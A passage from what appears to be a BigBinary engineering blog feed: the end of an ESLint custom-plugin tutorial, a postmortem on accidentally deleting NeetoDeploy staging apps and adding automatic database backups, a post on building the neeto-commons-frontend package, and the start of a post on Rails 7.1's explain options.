  README.md</code></pre></li><li><p>Let us add ESLint as a devDependency in our plugin:</p><pre><code class="language-bash">npm install -D eslint</code></pre></li></ol><h3>Adding and exporting custom rules</h3><p>Copy the rules we created into <code>no-var.js</code> and <code>strict-equality.js</code>. Now, how do we help the plugin find our rules? You can add the following to <code>index.js</code> in the plugin's root directory:</p><pre><code class="language-javascript">module.exports = {
  rules: {
    &quot;no-var&quot;: require(&quot;./src/rules/no-var&quot;),
    &quot;strict-equality&quot;: require(&quot;./src/rules/strict-equality&quot;),
  },
};</code></pre><p>By configuring the index file in this way, you ensure that ESLint recognizes and associates your custom rules with the specified names, making them accessible in ESLint configurations.</p><h3>Adding test files</h3><p>In a similar manner to how rules are handled, we can establish a unified entry point for our tests in <code>src/tests/index.js</code>:</p><pre><code class="language-javascript">require(&quot;./no-var.js&quot;);
require(&quot;./strict-equality.js&quot;);</code></pre><p>You can either set up a test framework of your choice to run the tests or run them directly using:</p><pre><code class="language-bash">node src/tests</code></pre><p>Explore the complete code for the custom plugin, containing both the rules and their corresponding tests that we have developed this far, in <a 
href="https://github.com/KrishnapriyaSkk/eslint-plugin-custom">eslint-plugin-custom</a>.</p><h3>Integrating the custom plugin</h3><p>You saw in earlier sections that it is possible to test your rules using <code>RuleTester</code>. While this method helps you specify all the edge cases and test your rules against them, it is not easy to think of every possible edge case. For this, we need to run our rules in real projects, and we will have to achieve this without publishing our package to the remote registry right away.</p><ul><li><h4>Integrate and test locally using yalc</h4><p>Yalc acts as a very simple local repository for your locally developed packages that you want to share across your local environment. Let us see how we can use <code>yalc</code> to test our custom plugin on host projects.</p><ol><li><p>Install <code>yalc</code> globally:</p><pre><code class="language-bash">npm install -g yalc</code></pre></li><li><p>Navigate to the root directory of your custom plugin and publish it to the local <code>yalc</code> store:</p><pre><code class="language-bash">cd eslint-plugin-custom
yalc publish</code></pre></li><li><p>Navigate to the root directory of the host project. Add the custom plugin using <code>yalc</code>:</p><pre><code class="language-bash">cd my-host-project
yalc add eslint-plugin-custom</code></pre></li><li><p>Update your ESLint configuration in the host project to include the plugin and its rules in <code>.eslintrc.js</code>:</p><pre><code class="language-javascript">module.exports = {
  // Other configurations
  plugins: [&quot;custom&quot;],
  rules: {
    &quot;custom/no-var&quot;: &quot;error&quot;,
    &quot;custom/strict-equality&quot;: &quot;error&quot;,
    // Other rules
  },
};</code></pre><p>Here, we have excluded the prefix <code>eslint-plugin-</code> while specifying the plugin name and used only the word <code>custom</code>. ESLint automatically recognizes plugins without the <code>eslint-plugin-</code> prefix when specified in the configuration file. 
Trimming off this prefix is a common practice to simplify the plugin name and make it more user-friendly in the context of the host project.</p><p>We also namespaced the rules under their respective plugin. By doing so, we ensure that ESLint can distinguish between conflicting rule names, if any, and apply the correct rules based on your configuration.</p></li><li><p>Testing the custom plugin in the host project:</p><ul><li><p>This can be done by running ESLint rules for a specific file:</p><pre><code class="language-bash">npx eslint &lt;file_path&gt;
# or to apply and test fixes
npx eslint --fix &lt;file_path&gt;</code></pre></li><li><p>You can use a glob pattern, such as <code>**/*.js</code>, to run ESLint on the entire project by specifying the file path pattern that matches the desired files to be linted:</p><pre><code class="language-bash">npx eslint &quot;./app/javascript/src/**/*.{js,jsx,json}&quot;</code></pre></li><li><p>You can integrate ESLint into VSCode by installing the <a href="https://marketplace.visualstudio.com/items?itemName=dbaeumer.vscode-eslint">ESLint extension</a>. Once installed, to apply any changes made to ESLint configurations, simply restart the ESLint server by opening the Command Palette (<code>Ctrl+Shift+P</code> or <code>Cmd+Shift+P</code>) and searching for &quot;ESLint: Restart ESLint Server&quot;. This will help you see red squiggly lines under the code containing the error. 
It is a good visual representation of our ESLint rule.</p><p><img src="/blog_images/2023/enhance-code-quality-and-performance-with-eslint/restart_eslint_server.gif" alt="Restart ESLint Server"></p></li></ul><p>Do not forget to note down any edge cases you come across, so that you can refactor your rule's logic to cover those cases.</p></li><li><p>Every time you make a change in your plugin, you can push those changes to your host projects by running the following command from your ESLint plugin's root directory:</p><pre><code class="language-bash">yalc push</code></pre></li><li><p>Once you are done with testing your plugin locally, remove it from the <code>package.json</code> of your host project by running the following command from your host project's root directory:</p><pre><code class="language-bash">yalc remove eslint-plugin-custom</code></pre></li></ol></li><li><h4>Integrating the published plugin package</h4><p>Once you publish the plugin to the remote registry, you can integrate it into your host projects.</p><ol><li><p>Add the custom plugin as a devDependency to your project using the command:</p><pre><code class="language-bash">yarn add -D &quot;eslint-plugin-custom&quot;</code></pre></li><li><p>Configure ESLint to enable your custom rules. We have already added the necessary configurations in the <code>yalc</code> integration steps above.</p></li></ol></li></ul><h3>Adding a recommended configuration</h3><p>When dealing with multiple host projects, it becomes a repetitive task to include the same rules and error levels in each project. Any updates or adjustments to these rules would then need to be applied across all projects individually. To streamline this process, a recommended configuration lets us keep all those configs within the ESLint plugin itself. This way, we can easily maintain and modify the rules without the need for duplicating effort in every project.</p><p>Imagine we want to recommend using our current rules as warnings. 
In that case, we can add a recommended config in our eslint-plugin-custom's <code>index.js</code>:</p><pre><code class="language-javascript">module.exports = {
  rules: {
    &quot;no-var&quot;: require(&quot;./src/rules/no-var&quot;),
    &quot;strict-equality&quot;: require(&quot;./src/rules/strict-equality&quot;),
  },
  configs: {
    recommended: {
      rules: {
        &quot;custom/no-var&quot;: &quot;warn&quot;,
        &quot;custom/strict-equality&quot;: &quot;warn&quot;,
      },
    },
  },
};</code></pre><p>In the host project where you want to use your custom plugin, you can install the plugin and configure ESLint to extend the recommended configuration in <code>.eslintrc.js</code>:</p><pre><code class="language-javascript">{
  &quot;extends&quot;: [
    &quot;eslint:recommended&quot;,
    &quot;plugin:custom/recommended&quot;
  ],
  // Other ESLint configurations for your project.
  &quot;rules&quot;: {
    // Other project-specific rules.
  }
}</code></pre><h2>General tips on using ESLint</h2><p>In this section, we will explore some general tips and tricks that will empower you to navigate through false positives, troubleshoot common pitfalls, and handle ESLint warnings well.</p><h3>Handling false positives</h3><p>Sometimes, ESLint can be overzealous and flag code as incorrect even when it's acceptable. Alternatively, there may be instances where we intentionally choose to adopt a particular coding style and wish to prevent ESLint from throwing errors. 
Here are a couple of strategies to address these errors:</p><ol><li><p>Disabling ESLint rules:</p><p>You can temporarily disable the rule responsible for the false alarm by adding a comment above the code, like this:</p><pre><code class="language-javascript">// eslint-disable-next-line &lt;rule_name&gt;</code></pre><p>Example:</p><pre><code class="language-javascript">// Reason for disabling the rule.
// eslint-disable-next-line no-console
console.log(&quot;All tests were executed&quot;);</code></pre><p>Do not forget to specify the reason why you have disabled that particular rule for that line, to avoid any future confusion.</p></li><li><p>Altering configuration:</p><p>ESLint provides an option to configure a rule as per your needs. Some rules accept additional options to customize their behavior. An example is <a href="https://eslint.org/docs/latest/rules/camelcase">camelcase</a>, which enforces the use of camel case for variable names. It accepts <a href="https://eslint.org/docs/latest/rules/camelcase#options">options</a> to disable enforcing camel casing for specific cases. In a case where you want to use a different naming convention, such as snake case, for object keys, you can set the <code>properties</code> option to <code>never</code>:</p><pre><code class="language-javascript">// .eslintrc
{
  &quot;rules&quot;: {
    &quot;camelcase&quot;: [&quot;error&quot;, { &quot;properties&quot;: &quot;never&quot; }]
  }
}</code></pre><p>This configuration tells ESLint to exclude properties (object keys) from the camel case requirement.</p><p>We can accept options in our custom rules as well and access them inside our rules via <code>context.options</code>. Then, you can perform the necessary logic to handle such cases.</p></li></ol><h3>Common reasons for ESLint checks to crash</h3><p>While using ESLint, you might encounter situations where ESLint checks crash or fail unexpectedly. 
Keep these in mind to avoid such crashes:</p><ol><li><p>If you update or switch ESLint configurations, make sure to run <code>yarn install</code> or <code>npm install</code> to install any missing dependencies.</p></li><li><p>Ensure that your ESLint configuration has accurate parser options, like the language version and ECMAScript features, as they are crucial for ESLint to parse and analyze your code correctly.</p></li></ol><h3>Should we consider ESLint warnings?</h3><p>As we've seen in previous sections, ESLint allows us not only to report errors but also to show warnings. When creating a rule, it may not always be possible to cover every edge case and eliminate all false positives. In such situations, we can configure these rules as warnings instead. Additionally, there are cases where we don't want to enforce a specific coding style but rather suggest a more optimized approach to the developer. In such scenarios as well, we avoid throwing errors.</p><p>While ESLint warnings don't necessarily require disabling through comments, it's recommended to review and address them whenever feasible. This practice improves code quality, helps prevent future errors, and enhances the overall robustness of the codebase. However, if you find that a suggestion does not apply to your specific situation, you have the flexibility to disregard it or disable it by including a comment.</p><h2>Conclusion</h2><p>Throughout this blog, we explored various aspects of ESLint, including understanding its purpose and benefits, configuring rules on a project, writing custom rules and plugins, and testing them effectively. We also discussed general tips for using ESLint, such as handling false positive errors, dealing with crashes, and considering warnings.</p><p>Remember to periodically review and update your ESLint configurations as your project evolves, and stay up-to-date with the latest ESLint releases and rule updates to take advantage of new features and improvements. 
To know more about the functionalities of ESLint, you can refer to the <a href="https://eslint.org/docs/">ESLint documentation</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Accidentally deleting all staging applications and building automatic database backup]]></title>
       <author><name>Subin Siby</name></author>
      <link href="https://www.bigbinary.com/blog/routine-db-exports-neetodeploy"/>
      <updated>2023-07-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/routine-db-exports-neetodeploy</id>
<content type="html"><![CDATA[<p>We are building <a href="https://neeto.com/neetodeploy">NeetoDeploy</a>, an alternative to Heroku that makes it easy to deploy and manage applications on the cloud. It is built with a mix of Kubernetes and Rails.</p><p>We switched our pull-request <a href="https://devcenter.heroku.com/articles/github-integration-review-apps">review apps from Heroku</a> to NeetoDeploy a couple of months ago, and it has been doing well. As the next step of the process, we are building features to target staging and production. We had an essential staging setup in March, and by the end of the month, we had migrated staging deployments of all Neeto products from Heroku to NeetoDeploy. Everything was working fine for a week until I made a grave mistake.</p><h2>What happened</h2><p>Whenever a PR is opened or a new commit is pushed, NeetoDeploy receives a webhook call from GitHub. Review/staging apps are created/updated on NeetoDeploy in response to these webhook calls.</p><p>On April 5, 2023, a misconfiguration caused NeetoDeploy's webhook handler to malfunction for an hour. As a result, some review apps were not deleted even after the corresponding PRs were closed or merged. The solution was cross-checking review apps with the open PRs and deleting the unwanted apps. Using <code>rails console</code>, this could be done live on the server.</p><p>Here is what that solution looked like:</p><pre><code class="language-ruby">GithubRepository.find_each do |github_repository|
  access_token = github_repository.github_integration.access_token
  github_client = Octokit::Client.new(access_token:)
  open_pr_numbers = github_client
    .pull_requests(github_repository.name, state: :open)
    .pluck(:number)

  github_repository.project.apps.find_each do |app|
    next if open_pr_numbers.include?(app.pr_number)

    Apps::DestroyService.new(app).process!
  end
end</code></pre><p>But there is a terrible mistake in the above code. 
See if you can spot it.</p><p>I'm going to wait...</p><p>A bit more waiting... Enough waiting; here's the mistake:</p><p>There is no filter on the apps that were picked to be destroyed. This snippet was written at a time when we only had review apps. So <code>github_repository.project.apps</code> was expected to return review apps. But we now also had staging apps in the database. And those staging apps weren't filtered out here. After running the snippet and noticing it took longer than expected, I realized the mistake and instantly pressed <code>CTRL + C</code>. Of course, it was taking time since it was deleting all the staging app databases and dynos.</p><p>In the end, out of 33 staging apps, only five remained. And thus started the procedure to restore all of them.</p><h2>The recovery</h2><p>NeetoDeploy already had the feature to do manual <a href="https://help.neetodeploy.com/articles/database-exports">DB exports</a>, but this wasn't being done routinely. We were only hosting review apps (whose data need not be persisted reliably), and staging had started just a week before.</p><p>We had database backups from a week before (when we ultimately migrated staging apps off Heroku), and one by one, our small team of 4 brought back all the apps in 2 days. The next step is to try not to let this happen again, and if it were to happen again, to have a contingency plan. We thought of two types of contingency plans:</p><ul><li>Automatic scheduled backups</li><li>Disk snapshots of the DB</li></ul><h2>Automatic scheduled backups</h2><p>The idea is that the database would be exported at a particular time every day. Backups older than a month would be deleted automatically to save space.</p><p>We implemented this in a week. Every day at 12 AM UTC, all staging and production databases would be exported and uploaded to an S3 bucket.</p><p>While this feature was being implemented, I used the Rails console to manually export all the apps. 
The exported file URLs of each DB were manually copied to a text file. <a href="https://aria2.github.io/">aria2c</a> was then used to download them in parallel to a local folder:</p><pre><code class="language-bash">aria2c -c --input-file export_urls.txt</code></pre><p>aria2c is a smart downloader. It will resume interrupted downloads, won't duplicate downloads, and does everything in parallel.</p><h2>Disk snapshots of the DB</h2><p>The other contingency method is to take periodic snapshots of the volume holding the DB. We are working on this.</p><p>You can refer to this <a href="https://about.gitlab.com/blog/2017/02/10/postmortem-of-database-outage-of-january-31/#broken-recovery-procedures">blog post from GitLab</a> to learn about their recovery procedures when they faced a significant data loss in 2017.</p><h2>Lessons</h2><p>The core lesson here is to call destructive methods very carefully. Instead of calling the <code>DestroyService</code> instantly, there could have been an intermediate human check:</p><pre><code class="language-ruby">apps = []

GithubRepository.find_each do |github_repository|
  access_token = github_repository.github_integration.access_token
  github_client = Octokit::Client.new(access_token:)
  open_pr_numbers = github_client
    .pull_requests(github_repository.name, state: :open)
    .pluck(:number)

  github_repository.project.apps.review.find_each do |app|
    next if open_pr_numbers.include?(app.pr_number)

    apps.append(app)
  end
end</code></pre><p>This would populate the list of apps to delete in the <code>apps</code> variable; it can be displayed and verified, and then we can destroy the apps individually:</p><pre><code class="language-ruby">apps.map do |app|
  Apps::DestroyService.new(app).process!
end</code></pre><p>The other takeaway here is to have proper recovery mechanisms in place. Human/system errors are possible; we should be prepared for when they happen.</p><p><a href="https://neeto.com/neetodeploy">NeetoDeploy</a> is still not production-ready. However, if you want to give 
NeetoDeploy a try, then tweet to us at <a href="https://twitter.com/neetodeploy">@neetoDeploy</a> or send us an email at <code>invite@neeto.com</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Challenges faced while building Neeto commons frontend]]></title>
       <author><name>Amaljith K</name></author>
      <link href="https://www.bigbinary.com/blog/neeto-commons-frontend"/>
      <updated>2023-07-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/neeto-commons-frontend</id>
      <content type="html"><![CDATA[<p>At <a href="https://www.neeto.com/">neeto</a>, we are building<a href="https://blog.neeto.com/p/neeto-products-and-people">a lot of products</a> tosimplify how we work. Many of these products share similar features, such as a404 page, team member invitations, a sidebar, app switcher, Slack integration,etc. For consistency in both UI and functionality, these common businessrequirements must remain uniform across all Neeto products.</p><p>To bring a new Neeto product to market, we used to copy the whole repo of analready existing product and then we used to delete the previous product-specificcode from the new repo. This ensured that the visual design, applicationinitialization logic, code quality enforcement rules, etc. are the same in allNeeto products. However, during active development, we noticed three bigproblems with the consistency of Neeto products.</p><ul><li>Different teams implemented the same business requirements in different ways,causing products to go out of sync.</li><li>Bringing an update to the common functionality required manual changes toevery repository.</li><li>Some teams made quick and dirty changes to the common copied logic to fixcoding inconveniences.</li></ul><p>To address these challenges, we needed a way to share the common code. Simplycopying the common code to each repository was not scalable. We built a ruby gemnamed <code>neeto-commons-backend</code> and an NPM package named <code>neeto-commons-frontend</code>to hold all our common code.</p><p>The implementation of the <code>neeto-commons-backend</code> gem was relatively easy, butthe implementation of the frontend package, <code>neeto-commons-frontend</code>, posedseveral challenges. Let's discuss some of the challenges we faced while building<code>neeto-commons-frontend</code>.</p><h3>public or private?</h3><p>Both <code>neeto-commons-backend</code> and <code>neeto-commons-frontend</code> contained a lot ofbusiness logic specific to neeto. 
So having these two repos as &quot;private&quot; inGitHub was an easy call.</p><p>When it comes to using <code>neeto-commons-backend</code> gem, we can directly use the gemfrom GitHub if we configure the access tokens correctly in the hostapplications. Recently, we have deployed a private gem server to host our gems.However, for <code>neeto-commons-frontend</code>, things aren't that straightforward. If wedecide to serve the package directly from Github private repository, we willhave the following problems:</p><ul><li><p>Apart from <code>neeto-commons-frontend</code>, we have multiple other frontend packages.To use <code>neeto-commons-frontend</code> as a dependency in them, we will need tohardcode the GitHub access token in their <code>package.json</code> file. But, <code>package.json</code>is considered to be a public file. So it is not safe to add any secret keys ortokens to it. If we unknowingly publish any of those packages to npm, ourtokens would leak to the public.</p></li><li><p>We cannot directly use the ES6 source code in the host application. We need totranspile the JS files before serving. If we were serving<code>neeto-commons-frontend</code> directly from GitHub, we are limited to theseoptions:</p><ul><li>Add a <code>post_install</code> hook to the package: <code>post_install</code> command is said tobe executed at the time of running <code>yarn install</code> or <code>yarn add</code> on the hostproject. We can add a command to transpile <code>neeto-commons-frontend</code> fromthat hook. But the <code>post_install</code> hook isn't guaranteed to always run. So itisn't a reliable strategy.</li><li>Another option is to maintain a copy of transpiled JS output in our GitHubrepo by using pre-commit and prepush hooks. But, keeping generated code inversion control isn't a good practice. 
Moreover, we can't trust pre-commit and pre-push hooks because they can be skipped or can fail to run.</li></ul></li></ul><p>So, we decided to bundle <code>neeto-commons-frontend</code>'s JS code using <a href="https://rollupjs.org">rollup</a> and release it to NPM as a public package. Even though the source code will remain private on GitHub, this would make our bundle available to the public. Anyone can run <code>yarn add @bigbinary/neeto-commons-frontend</code> to obtain our JS bundle.</p><p>However, minified JavaScript bundles are nearly impossible to comprehend. Hence, we think it's reasonable to make them public. We anyway need the JavaScript bundle to be served publicly in browsers while loading Neeto products; we cannot keep the frontend JS code completely private.</p><h3>Release management</h3><p>In the initial stages of building <code>neeto-commons-frontend</code>, we used to split a large feature into several small sub-issues, so we would raise many small PRs to accomplish a single feature. For this reason, we didn't want to publish a new version of <code>neeto-commons-frontend</code> after merging every PR. We needed manual control over the publishing process.</p><p>Also, whenever we did decide to publish a new version, we wished to have an automated mechanism to generate release notes explaining the changes from the previous revision.</p><p>To satisfy these requirements, we decided to use <a href="https://docs.github.com/en/repositories/releasing-projects-on-github/managing-releases-in-a-repository">GitHub releases</a>. It offered the following benefits:</p><ul><li>GitHub can automatically generate release notes using the titles of the PRs merged since the last release.</li><li>The generated release notes contain a link to visualize the code diff between the current and previous releases.</li><li>We can run a GitHub action to automatically publish the package to npm when we create a new release.</li></ul><p>We successfully followed that process for a long time.
Later on,<code>neeto-commons-frontend</code> became stable. Now, each PR is comprehensive andrequires an NPM publish. So, we changed our GitHub action to create a GitHubrelease and publish the package to NPM on every PR merge.</p><h3>common initializers</h3><p>The <code>neeto-commons-backend</code> gem consists of various code components necessaryfor initializing the Rails backend, such as configuring CORS, establishingcache, and more.</p><p>Likewise, in the frontend, certain initialization tasks must be completed beforethe React components can begin rendering. These tasks include configuring Axiosinterceptors and headers, initializing Honeybadger and Mixpanel integrations,setting up translation resources, and more.</p><p>Just like <code>neeto-commons-backend</code>, we wanted <code>neeto-commons-frontend</code> to performall these frontend initialization tasks on its own. But it wasn't asstraightforward as we anticipated. Here are some challenges we faced whileinitializing the host application from <code>neeto-commons-frontend</code>:</p><h4>Modifying axios instance of the host application</h4><p>Axios lets us customize its default instance at runtime by adding customheaders. With that, all network requests from our app will have those headersset implicitly. Also, Axios lets us register request and responseinterceptors to view and edit requests and responses before it is sent orreceived.</p><p>All Neeto products use this feature to set the Auth token and CSRF token in theheaders. They also register interceptors for different use cases like showingtoaster messages, handling authorization errors, etc.</p><p>Since this logic is the same in all products, we decided to move it to<code>neeto-commons-frontend</code>. 
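A hedged sketch of the kind of shared Axios setup described above (the function and header names are illustrative, not the actual <code>neeto-commons-frontend</code> code; a tiny stand-in object replaces the real <code>axios</code> module so the sketch is self-contained):

```javascript
// Stand-in for the shared axios instance (the real package would
// `import axios from "axios"`, resolved to the host app's own copy
// because axios is a peerDependency).
const axios = {
  defaults: { headers: { common: {} } },
  interceptors: {
    response: {
      handlers: [],
      use(onFulfilled, onRejected) {
        this.handlers.push({ onFulfilled, onRejected });
      },
    },
  },
};

// What a commons package could do at startup: set default headers and
// register interceptors once, on the single shared instance.
// `initializeAxios` and the header names are hypothetical.
const initializeAxios = (instance, { authToken, csrfToken }) => {
  instance.defaults.headers.common["X-Auth-Token"] = authToken;
  instance.defaults.headers.common["X-CSRF-Token"] = csrfToken;
  instance.interceptors.response.use(
    response => response,
    error => Promise.reject(error) // e.g. show a toaster, handle 401s
  );
};

initializeAxios(axios, { authToken: "token-123", csrfToken: "csrf-456" });
console.log(axios.defaults.headers.common["X-Auth-Token"]); // token-123
```

Since the host application and the package would import the same module instance, every request made by the host picks up these defaults and interceptors.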
Our requirement was to customize the host project'sAxios instance from <code>neeto-commons-frontend</code>, without having to write any codefrom the host project.</p><p>For better clarity, let us assume that we are trying to initialize Axios in<a href="https://www.neeto.com/neetocal">NeetoCal</a> using <code>neeto-commons-frontend</code>.</p><p>To use Axios in <code>neeto-commons-frontend</code>, just like any other JS project, weneed to add <code>axios</code> to its package.json. But if we were to add <code>axios</code> as adependency, rollup will pull out the source code from <code>axios</code> and include it inthe package's published bundle.</p><p>Similarly, since NeetoCal has both <code>neeto-commons-frontend</code> and <code>axios</code> as itsdependencies, <a href="https://webpack.js.org">webpack</a> will pull out both of theirsource code and add it to the JS bundle of NeetoCal. It will cause NeetoCal's JSbundle to have two copies of <code>axios</code> code. One from NeetoCal's dependencies andanother one from <code>neeto-commons-frontend</code>'s bundle.</p><p>When a browser loads NeetoCal's bundle, both those codes will get initializedand we will have two separate instances of Axios. Any customizations done from<code>neeto-commons-frontend</code> will be applicable only to its own Axios instance. Wewon't be able to touch the NeetoCal's Axios instance from<code>neeto-commons-frontend</code>.</p><p>As a solution for this, we defined <code>axios</code> as a <code>peerDependency</code> in<code>neeto-commons-frontend</code>'s package.json. Since we use<a href="https://www.npmjs.com/package/rollup-plugin-peer-deps-external">rollup-plugin-peer-deps-external</a>plugin, rollup will consider <code>axios</code> as an external dependency while bundling.That means rollup will not pull code from <code>axios</code> and add it to<code>neeto-commons-frontend</code> bundle. 
Instead, it will keep the<code>import axios from &quot;axios&quot;</code> statement as it is and assume that NeetoCal willhave this dependency installed and available at runtime.</p><p>Since both NeetoCal and <code>neeto-commons-frontend</code> are now importing Axios fromthe same source, both of them will share the same instance. Any modificationsdone from <code>neeto-commons-frontend</code> will reflect on the Axios instance used inthe project as well.</p><h4>Placement of initialization logic</h4><p>We were unsure of where to initialize the application from. We first triedinitializing the app from <code>useEffect</code> hook of the top-most component, <code>App.jsx</code>.</p><p>But, as per React's life cycle, the app will run one complete render cycle ofall nested components before <code>useEffect</code> gets called. Also, a parent component's<code>useEffect</code> will be executed only after all the <code>useEffect</code>s registered in thechild components are completed.</p><p>This won't work for us due to the following reasons:</p><ul><li>We were using <code>i18next.t()</code> function in several constants to render localetranslations. For the translations to be available, we need to initialize<code>i18next</code> before using it. But since constants get initialized immediatelyafter the bundle is loaded, all those calls will result in<code>Translation not found</code> errors.</li><li>Some nested components were performing API calls from their <code>useEffect</code> hooks.Since initialization is not completed by that time, the requests will fail dueto missing authentication keys.</li></ul><p>To avoid the problem with the delay in <code>useEffect</code> hook, we could have invokedthe initialization step directly from the rendering code of <code>App.jsx</code>, byinlining it with the function definition. But, it is not a good practice tointroduce side effects from outside <code>useEffect</code> hooks. 
So, we didn't go with that.</p><p>After some trial and error, we finally decided to place the initialization function call in <code>app/javascript/packs/application.js</code>. It is the file that gets executed before React gets mounted. So our app will be fully initialized before it starts to render.</p><h3>utility functions</h3><p>We created <code>neeto-commons-frontend</code> by copying common code from all neeto products to it. We identified these categories of common code: application initialization logic, React components and hooks, and general utility functions.</p><p>When copying utility functions, we realized that we could implement a new set of utility functions to minimize boilerplate code in all Neeto products. There are a lot of operations done using array functions like <code>map</code>, <code>filter</code>, <code>find</code>, etc. The most common boilerplate was arrow functions that compare nested properties.</p><p>We decided to introduce a function <code>matches</code>, which checks whether the given pattern is partially equal to the given object. It works like this: the pattern <code>{ name: &quot;Oliver&quot; }</code> matches the object <code>{ name: &quot;Oliver&quot;, phone: 000000 }</code> because the object contains the key <code>name</code> and its value is the same in both the pattern and the object.</p><p>With this function as the foundation, we built several array functions like <code>findBy</code>, <code>removeBy</code>, <code>replaceBy</code>, etc. All these functions look for the element that <code>match</code>es the given pattern in an array and perform the required operation on that element.</p><p>We also took inspiration from Ramda and implemented currying for such utility functions. This shortened the JS code and made it more declarative.</p><pre><code class="language-js">// before
setUsers(users =&gt;
  users.map(user =&gt; (user.address.pincode === 600213 ? newUser : user))
);

// after
setUsers(replaceBy({ address: { pincode: 600213 } }, newUser));</code></pre><pre><code class="language-js">// before
const defaultOrg = organizations.find(({ users }) =&gt;
  users.includes(DEFAULT_USER)
);

// after
const defaultOrg = findBy({ users: includes(DEFAULT_USER) }, organizations);</code></pre><p>You can read our blog <a href="https://www.bigbinary.com/blog/extending-pure-utility-functions-of-ramda">Extending pure utility functions of Ramda.js</a> to learn more about how we built these utility functions.</p><h3>dependency management</h3><p>The utility functions exported by <code>neeto-commons-frontend</code> are like an extension to Ramda. They can be used outside Neeto web applications as well. Several frontend packages and even the React Native team can use these utility functions.</p><p>Since we import multiple packages as external modules (to use the host project's modules, for example, Axios), we cannot export <code>neeto-commons-frontend</code> as a single bundle; doing so would force the host applications to add all those packages to their dependencies.</p><p>To avoid this problem, we decided to create separate bundles for each category. We now have four independent bundles: <code>pure</code>, <code>utils</code>, <code>react-utils</code>, and <code>initializers</code>.</p><p>The <code>pure</code> bundle contains all the pure functions we have discussed earlier. It needs only Ramda as an external dependency. The <code>utils</code> bundle encompasses general utility functions that depend on packages other than Ramda. An example is the <code>copyToClipboard</code> function. It shows a toaster message if copying is successful, so it depends on the <code>@bigbinary/neetoui</code> package as well. <code>react-utils</code> and <code>initializers</code> contain several neeto-specific external dependencies.
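As an illustration of the pattern-matching utilities described in the utility functions section, here is a hedged sketch (heavily simplified; the real <code>neeto-commons-frontend</code> implementations are Ramda-based and fully curried):

```javascript
// `matches` returns true when every key in `pattern` is partially equal
// to the corresponding value in `object`. Function values in the
// pattern act as predicates (like `includes(DEFAULT_USER)` earlier).
const matches = (pattern, object) =>
  Object.entries(pattern).every(([key, value]) => {
    if (typeof value === "function") return value(object[key]);
    if (value !== null && typeof value === "object") {
      return object[key] != null && matches(value, object[key]);
    }
    return object[key] === value;
  });

// Array helpers built on `matches`; `replaceBy` is curried so the
// result can be passed straight to a state setter like `setUsers`.
const findBy = (pattern, array) => array.find(item => matches(pattern, item));
const replaceBy = (pattern, replacement) => array =>
  array.map(item => (matches(pattern, item) ? replacement : item));

const users = [
  { name: "Oliver", address: { pincode: 600213 } },
  { name: "Eve", address: { pincode: 600214 } },
];

console.log(findBy({ name: "Oliver" }, users).address.pincode); // 600213
console.log(replaceBy({ address: { pincode: 600213 } }, { name: "Sam" })(users)[0].name); // Sam
```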
They are designed to work only on Neeto web apps.</p><h3>IDE support &amp; types</h3><p>Initially, all frontend packages at BigBinary were serving UMD bundles. They arecompatible with every environment. So there is not much headache of having topublish multiple bundles for different environments.</p><p>But UMD bundles do not assist IDEs well. That is, IDE can't provide auto-import,autocompletion, and type support if we distribute UMD packages alone. IDEs evengive false positive errors when importing items from the package since theycan't detect such an export in the bundle.</p><p>The first workaround we tried is to serve ESM or CJS bundles instead of UMD.Both ESM and CJS work well with imports. But imports from the bundle areimplicitly typed as <code>any</code> by the IDE. We won't get any predictions for functionparameters or component props. We were OK with this setup for a few weeks. Thisat least does not give false positive errors.</p><p>But the problem with this setup is that the developer continuously needs torefer to the docs to understand the parameters a function accepts. Thissignificantly degrades the development experience. To avoid this hassle, somedevelopers preferred not to use our functions and instead wrote lengthy vanillaJS code.</p><p>Later, we found a solution to this problem. We added explicit type definitionusing <code>.d.ts</code> files in <code>neeto-commons-frontend</code> package. They contain the typedefinition of all our exports, written in typescript. We won't copy the JSimplementation code to it. It will only contain function declarations.</p><p>Since we were exporting four different bundles, we had to add four different<code>.d.ts</code> files with the same name as the bundle. That is, we have <code>pure.d.ts</code>,<code>utils.d.ts</code>, <code>react-utils.d.ts</code>, and <code>initializers.d.ts</code>. 
The IDE automaticallypicks up the correct type definition file for the bundle we are importing anduses it to give predictions.</p><p>The introduction of type declaration helped us improve the IDE supportsignificantly. It also allows us to add JSDoc comments and deprecation noticesfor the exported items. Using these, the IDE can show documentation for thefunctions while the developer types.</p><h3>People not knowing the available functions</h3><p>Even though we were exporting tons of functions from <code>neeto-commons-frontend</code>,people were not aware of the existence of many of them. So we found that manywere reinventing the wheel or wasting their time writing the boilerplate.</p><p>As a solution for this, we decided to add some custom ESLint rules to<code>eslint-plugin-neeto</code>, which shows warnings to the user about a possible Ramda or<code>neeto-commons-frontend</code> alternative when we detect a corresponding boilerplatecode.</p><p>You can find the story behind <code>eslint-plugin-neeto</code> and the challenges facedduring its development on another blog here.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.1 enables detailed query plan analysis with options in ActiveRecord::Relation#explain]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/rails-7-1-adds-options-to-activerecord-relation-explain"/>
      <updated>2023-07-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-7-1-adds-options-to-activerecord-relation-explain</id>
      <content type="html"><![CDATA[<p>In Rails 7.1, an enhancement has been introduced to the<a href="https://apidock.com/rails/ActiveRecord/Relation/explain"><code>ActiveRecord::Relation#explain</code></a>method. This enhancement allows us to obtain detailed query plan analysis byspecifying options for the <code>explain</code> output.</p><h3>Understanding the EXPLAIN method</h3><p>Before diving into the new options available in Rails 7.1, let's quickly recapthe purpose and usage of the <code>explain</code> method in Active Record. The <code>explain</code>method is used to retrieve the execution plan of an SQL query chosen by thedatabase optimizer. It provides insight into how the database intends to executethe query, including the sequence of operations, indexes used, and estimatedcosts.</p><p>By analyzing the query plan, we can identify potential performance bottlenecks,optimize database schema design, and fine-tune queries for better efficiency.However, prior to Rails 7.1, the level of detail available in the explain outputwas limited.</p><h3>Detailed query plan analysis with options</h3><p>In Rails 7.1, the <code>explain</code> method accepts options, enabling us to customize theoutput and obtain a more detailed query plan analysis. It's important to notethat these options are the same ones that are already available in native SQL.Options may vary depending on the database used. In this blog post, we willfocus on examples using PostgreSQL. Let us take a look at some of the availableoptions.</p><h4>ANALYZE</h4><p>The <code>analyze</code> option causes the statement to be actually executed, not 